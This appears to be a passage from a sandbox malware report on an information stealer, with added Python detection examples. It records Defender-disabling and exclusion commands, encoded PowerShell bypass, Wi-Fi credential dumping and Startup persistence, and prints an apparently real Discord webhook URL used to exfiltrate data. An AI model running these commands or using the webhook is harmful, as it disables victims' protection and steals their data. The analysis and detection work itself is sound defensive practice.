Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 4292, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 4128, ProcessName: cmd.exe
                                Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 4292, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 4292, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                                Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 4292, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe, ParentProcessId: 6728, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 8076, ProcessName: svchost.exe
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8824, TargetFilename: C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.cmdline
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4128, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', ProcessId: 6628, ProcessName: powershell.exe
                                Source: Process startedAuthor: vburov: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe, ParentProcessId: 6728, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 8076, ProcessName: svchost.exe

                                Stealing of Sensitive Information

                                Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 4292, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 3780, ProcessName: cmd.exe
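The Sigma hits above all hang off one parent, C:\ProgramData\Microsoft\based.exe: it turns off Defender's real-time, IOAV, script and IPS protection and cloud reporting with Set-MpPreference, excludes itself with Add-MpPreference -ExclusionPath, wipes signatures with MpCmdRun.exe -RemoveDefinitions -All, runs encoded PowerShell under -ExecutionPolicy Bypass, drops a .scr into the Startup folder, reads the clipboard and dumps Wi-Fi profiles with netsh, while s.exe starts a file named svchost.exe from C:\ProgramData. What follows is an added example of how a detection engineer would tag such records and attribute them to the responsible process; it is not Joe Sandbox or Sigma code. The events are constructed to mirror the report's records (the -EncodedCommand payload is a placeholder, not the sample's), and the rule names and extension list are this example's own.

```python
"""Tag process-creation (EID 1) and file-creation (EID 11) records for the Defender
tampering, persistence and credential-access behaviour listed in the report.
Added example, not Joe Sandbox or Sigma code; events are constructed to mirror the
report's records and the rule names are this example's own."""
import re
from collections import defaultdict

# Constructed events. The -EncodedCommand payload is a placeholder (it decodes to
# "Start-Sleep 1"), not the one the sample ran.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 5036, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\ProgramData\\Microsoft\\based.exe",
     "CommandLine": 'C:\\Windows\\system32\\cmd.exe /c "powershell Set-MpPreference '
                    '-DisableRealtimeMonitoring $true -DisableScriptScanning $true '
                    '-MAPSReporting Disabled -SubmitSamplesConsent NeverSend && '
                    '"%ProgramFiles%\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All"'},
    {"EventID": 1, "ProcessId": 4128, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\ProgramData\\Microsoft\\based.exe",
     "CommandLine": 'C:\\Windows\\system32\\cmd.exe /c "powershell -Command Add-MpPreference '
                    "-ExclusionPath 'C:\\ProgramData\\Microsoft\\based.exe'\""},
    {"EventID": 1, "ProcessId": 8824,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\ProgramData\\Microsoft\\based.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                    "-EncodedCommand UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA="},
    {"EventID": 1, "ProcessId": 7968, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\ProgramData\\Microsoft\\based.exe",
     "CommandLine": 'C:\\Windows\\system32\\cmd.exe /c "powershell Get-Clipboard"'},
    {"EventID": 1, "ProcessId": 3780, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\ProgramData\\Microsoft\\based.exe",
     "CommandLine": 'C:\\Windows\\system32\\cmd.exe /c "netsh wlan show profile"'},
    {"EventID": 1, "ProcessId": 8076, "Image": "C:\\ProgramData\\svchost.exe",
     "ParentImage": "C:\\Users\\user\\AppData\\Local\\Temp\\_MEI47682\\s.exe",
     "CommandLine": '"C:\\ProgramData\\svchost.exe"'},
    {"EventID": 11, "ProcessId": 4292, "Image": "C:\\ProgramData\\Microsoft\\based.exe",
     "TargetFilename": "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\x.scr"},
    # Benign control: the real service host started by services.exe must not fire.
    {"EventID": 1, "ProcessId": 900, "Image": "C:\\Windows\\System32\\svchost.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe",
     "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"},
]

# Command-line patterns mapped to behaviour tags; case-insensitive to survive casing tricks.
CMDLINE_RULES = {
    "defender_protection_disabled": re.compile(
        r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IOAVProtection|ScriptScanning"
        r"|IntrusionPreventionSystem)\s+\$?true", re.I),
    "defender_cloud_disabled": re.compile(
        r"-MAPSReporting\s+Disabled|-SubmitSamplesConsent\s+(NeverSend|2)\b", re.I),
    "defender_definitions_removed": re.compile(r"MpCmdRun\.exe\W.*-RemoveDefinitions", re.I),
    "defender_exclusion_added": re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.I),
    "encoded_powershell_bypass": re.compile(
        r"powershell(\.exe)?\b.*-ExecutionPolicy\s+Bypass.*-EncodedCommand", re.I),
    "clipboard_capture": re.compile(r"\bGet-Clipboard\b", re.I),
    "wifi_profile_dump": re.compile(r"\bnetsh\s+wlan\s+show\s+profile", re.I),
}
# System binary names that have no business running outside the Windows directory.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
WINDOWS_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
AUTOSTART_EXT = (".scr", ".exe", ".lnk", ".vbs", ".bat", ".cmd")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def tag_event(ev):
    """Return the set of behaviour tags one event triggers; empty for ordinary activity."""
    tags = set()
    if ev["EventID"] == 1:
        cmd = ev.get("CommandLine", "")
        tags.update(name for name, rx in CMDLINE_RULES.items() if rx.search(cmd))
        image = ev["Image"].lower()
        if basename(image) in SYSTEM_NAMES and not image.startswith(WINDOWS_DIRS):
            tags.add("system_binary_name_outside_windows_dir")
    elif ev["EventID"] == 11:
        target = ev.get("TargetFilename", "").lower()
        if STARTUP_DIR in target and target.endswith(AUTOSTART_EXT):
            tags.add("startup_folder_persistence")
    return tags

def triage(events):
    """Attribute tags to the process responsible: the parent for a process start, the
    writer for a file create. One actor carrying many tags is the stealer, not noise."""
    by_actor = defaultdict(set)
    for ev in events:
        tags = tag_event(ev)
        if tags:
            actor = ev["ParentImage"] if ev["EventID"] == 1 else ev["Image"]
            by_actor[actor].update(tags)
    return dict(by_actor)

if __name__ == "__main__":
    for actor, tags in triage(SAMPLE_EVENTS).items():
        print(f"{actor}: {', '.join(sorted(tags))}")
```

Attributing by parent is what makes the chain visible: each cmd.exe child on its own is one Sigma hit, but based.exe accumulates all eight tags, while the legitimate svchost.exe under services.exe contributes nothing. On a live host the same tags can be confirmed with Get-MpPreference (the Disable* flags and ExclusionPath) and a listing of the Startup folder.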
                                No Snort rule has matched


                                AV Detection

                                Source: DevxExecutor.exe | Avira: detected
                                Source: https://superfurrycdn.nl/copy/ | Avira URL Cloud: Label: malware
                                Source: https://rentry.co/5uu99/raw | Avira URL Cloud: Label: malware
                                Source: C:\ProgramData\main.exe | Avira: detection malicious, Label: TR/Spy.KeyLogger.kapbl
                                Source: C:\ProgramData\setup.exe | Avira: detection malicious, Label: TR/CoinMiner.lnxah
                                Source: C:\Program Files\Google\Chrome\updater.exe | Avira: detection malicious, Label: TR/CoinMiner.lnxah
                                Source: https://superfurrycdn.nl/copy/ | Virustotal: Detection: 10%
                                Source: https://rentry.co/u4tup/raw | Virustotal: Detection: 7%
                                Source: C:\Program Files\Google\Chrome\updater.exe | ReversingLabs: Detection: 71%
                                Source: C:\ProgramData\Microsoft\based.exe | ReversingLabs: Detection: 47%
                                Source: C:\ProgramData\Microsoft\hacn.exe | ReversingLabs: Detection: 45%
                                Source: C:\ProgramData\main.exe | ReversingLabs: Detection: 65%
                                Source: C:\ProgramData\setup.exe | ReversingLabs: Detection: 71%
                                Source: C:\ProgramData\svchost.exe | ReversingLabs: Detection: 41%
                                Source: DevxExecutor.exe | ReversingLabs: Detection: 52%
                                Source: DevxExecutor.exe | Virustotal: Detection: 53%
                                Source: C:\ProgramData\main.exe | Joe Sandbox ML: detected
                                Source: C:\ProgramData\Microsoft\hacn.exe | Joe Sandbox ML: detected
                                Source: C:\ProgramData\setup.exe | Joe Sandbox ML: detected
                                Source: C:\ProgramData\svchost.exe | Joe Sandbox ML: detected
                                Source: C:\ProgramData\Microsoft\based.exe | Joe Sandbox ML: detected
                                Source: C:\Program Files\Google\Chrome\updater.exe | Joe Sandbox ML: detected
                                Source: DevxExecutor.exe | Joe Sandbox ML: detected
                                Source: DevxExecutor.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49718 version: TLS 1.2
                                Source: DevxExecutor.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbNN source: cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188225696.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2544890205.00007FF8B814C000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2193894661.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2549694907.00007FF8B8833000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: cstealer.exe, 00000009.00000002.2556408561.00007FF8B90E0000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: cstealer.exe, 00000009.00000002.2532242365.00007FF8B7E3E000.00000002.00000001.01000000.00000031.sdmp
                                Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: cstealer.exe, 00000009.00000002.2537892157.00007FF8B80A6000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2187624587.0000014E6F9D2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2551384631.00007FF8B90AD000.00000002.00000001.01000000.00000020.sdmp, cstealer.exe, 00000049.00000003.2467259696.000001DB63733000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: cstealer.exe, 00000009.00000002.2537892157.00007FF8B80A6000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188566786.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: cstealer.exe, 00000002.00000003.2160955520.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2186856638.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2187476154.0000014E6F9D2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp, cstealer.exe, 00000009.00000002.2558162642.00007FF8B9101000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188481865.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2548484415.00007FF8B8793000.00000002.00000001.01000000.0000002D.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: cstealer.exe, 00000009.00000002.2540558545.00007FF8B80ED000.00000002.00000001.01000000.00000029.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2194731679.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2454876358.00007FF8A8020000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188096980.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2536033958.00007FF8B8017000.00000002.00000001.01000000.0000002C.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188225696.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2544890205.00007FF8B814C000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\python311.pdb source: main.exe, 00000008.00000002.2222098181.00007FF8A8CCB000.00000040.00000001.01000000.0000001A.sdmp, cstealer.exe, 00000009.00000002.2497830571.00007FF8A86FB000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: cstealer.exe, 00000009.00000002.2476831702.00007FF8A8300000.00000002.00000001.01000000.0000002B.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC67DCE0 FindFirstFileExW,3_2_00000271DC67DCE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957E8D00 FindFirstFileExW,FindClose,3_2_00007FF6957E8D00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6958026C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF6958026C4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,3_2_00007FF6957F8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Code function: 4_2_00007FF6D6EA8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,4_2_00007FF6D6EA8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Code function: 4_2_00007FF6D6E98D00 FindFirstFileExW,FindClose,4_2_00007FF6D6E98D00
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Code function: 4_2_00007FF6D6EB26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF6D6EB26C4
                                Source: C:\Windows\System32\cmd.exe | Code function: 5_2_00000230D921DCE0 FindFirstFileExW,5_2_00000230D921DCE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 7_2_0000014E7128DCE0 FindFirstFileExW,7_2_0000014E7128DCE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 9_2_00007FF8A8033229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,9_2_00007FF8A8033229
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css

                                Networking

                                Source: unknown | DNS query: name: api.telegram.org
                                Source: global traffic | HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
                                Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                                Source: Joe Sandbox View | IP Address: 208.95.112.1
                                Source: Joe Sandbox View | IP Address: 149.154.167.220
                                Source: Joe Sandbox View | IP Address: 162.159.138.232
                                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: unknown | DNS query: name: ip-api.com
                                Source: unknown | DNS query: name: ip-api.com
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global traffic | HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
                                Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                                Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 | Host: ip-api.com | Accept-Encoding: identity | User-Agent: python-urllib3/2.2.1
                                Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                                Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
                                Source: global traffic | DNS traffic detected: DNS query: discord.com
                                Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                                Source: unknown | HTTP traffic detected: POST /api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCUsjdPQ1Te7Pa_y0P8C8O0P HTTP/1.1 | Host: discord.com | Accept-Encoding: identity | Content-Length: 689192 | User-Agent: python-urllib3/2.2.1 | Content-Type: multipart/form-data; boundary=47ab1338cc3a5d235f5896f1843d1118
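The traffic above is the whole stealer lifecycle on the wire: a plain-text fetch of Milinfo.txt from raw.githubusercontent.com (hosted configuration), GET /json/?fields=225545 on ip-api.com from a python-urllib3/2.2.1 client (victim geolocation from the PyInstaller-packed Python payload), a 689192-byte multipart POST to a Discord webhook (the actual exfiltration), and DNS for api.telegram.org (the Telegram RAT channel). The following is an added example of how to turn those request lines and headers into session-level indicators; it is not Joe Sandbox code. The requests are constructed from the report's request lines, the webhook ID and token are placeholders rather than the ones the sample used, and the 100 KiB upload threshold and indicator names are this example's own choices.

```python
"""Classify HTTP requests and DNS lookups of the kind recorded in the Networking section:
config fetch from raw.githubusercontent.com, geolocation via ip-api.com, upload to a
Discord webhook and a Telegram bot API lookup. Added example, not Joe Sandbox code;
requests are constructed from the report's request lines with a placeholder webhook."""
import re

WEBHOOK_PATH = re.compile(r"^/api/webhooks/(\d{17,20})/([\w-]{60,})$")
PYTHON_UA = re.compile(r"^python-(urllib3|requests)/", re.I)
EXFIL_BODY_BYTES = 100 * 1024  # assumed threshold: webhook POST bodies above this count as exfiltration

# Constructed requests. The webhook ID (all zeros) and token (68 x's) are placeholders.
SAMPLE_REQUESTS = [
    "GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1\r\nHost: raw.githubusercontent.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /json/?fields=225545 HTTP/1.1\r\nHost: ip-api.com\r\nAccept-Encoding: identity\r\n"
    "User-Agent: python-urllib3/2.2.1\r\n\r\n",
    "POST /api/webhooks/000000000000000000/" + "x" * 68 + " HTTP/1.1\r\nHost: discord.com\r\n"
    "Accept-Encoding: identity\r\nContent-Length: 689192\r\nUser-Agent: python-urllib3/2.2.1\r\n"
    "Content-Type: multipart/form-data; boundary=47ab1338cc3a5d235f5896f1843d1118\r\n\r\n",
    # Benign control: an ordinary browser request must yield no indicators.
    "GET /favicon.ico HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]
SAMPLE_DNS = ["ip-api.com", "raw.githubusercontent.com", "discord.com", "api.telegram.org"]

def parse_request(raw):
    """Parse an HTTP/1.1 request head into method, path, version and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "host": headers.get("host", "").lower(), "headers": headers}

def classify_request(req):
    """Indicators one request contributes; empty for ordinary traffic."""
    tags = set()
    host, path, hdr = req["host"], req["path"], req["headers"]
    if host == "discord.com" and WEBHOOK_PATH.match(path):
        tags.add("discord_webhook")
        body = int(hdr.get("content-length") or 0)
        multipart = hdr.get("content-type", "").startswith("multipart/form-data")
        # A webhook is write-only for the client: a large or multipart POST is an upload.
        if req["method"] == "POST" and (body >= EXFIL_BODY_BYTES or multipart):
            tags.add("discord_webhook_upload")
    if host == "ip-api.com" and path.startswith("/json"):
        tags.add("public_ip_geolocation")
    if host == "raw.githubusercontent.com" and req["method"] == "GET":
        tags.add("github_raw_fetch")
    if PYTHON_UA.match(hdr.get("user-agent", "")):
        tags.add("python_http_client")
    return tags

DNS_INDICATORS = {"api.telegram.org": "telegram_bot_api", "discord.com": "discord_api"}

def score_session(raw_requests, dns_names):
    """Combine per-request and DNS indicators into a verdict for one host's session."""
    indicators = set()
    for raw in raw_requests:
        indicators |= classify_request(parse_request(raw))
    indicators |= {DNS_INDICATORS[n] for n in dns_names if n in DNS_INDICATORS}
    return {"indicators": indicators,
            "exfiltration": "discord_webhook_upload" in indicators,
            "staging_and_recon": {"github_raw_fetch", "public_ip_geolocation"} <= indicators}

if __name__ == "__main__":
    verdict = score_session(SAMPLE_REQUESTS, SAMPLE_DNS)
    print(sorted(verdict["indicators"]), verdict["exfiltration"], verdict["staging_and_recon"])
```

The webhook path alone is enough to identify the channel, but the decisive evidence is the POST with a multipart body of 689192 bytes: a client never needs to send that much to a webhook unless it is uploading an archive. Because both the geolocation call and the upload carry the same python-urllib3 User-Agent, the two can be tied to one process even when only proxy logs are available.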
                                Source: cstealer.exe, 00000003.00000003.2183488711.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.../back.jpeg
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, 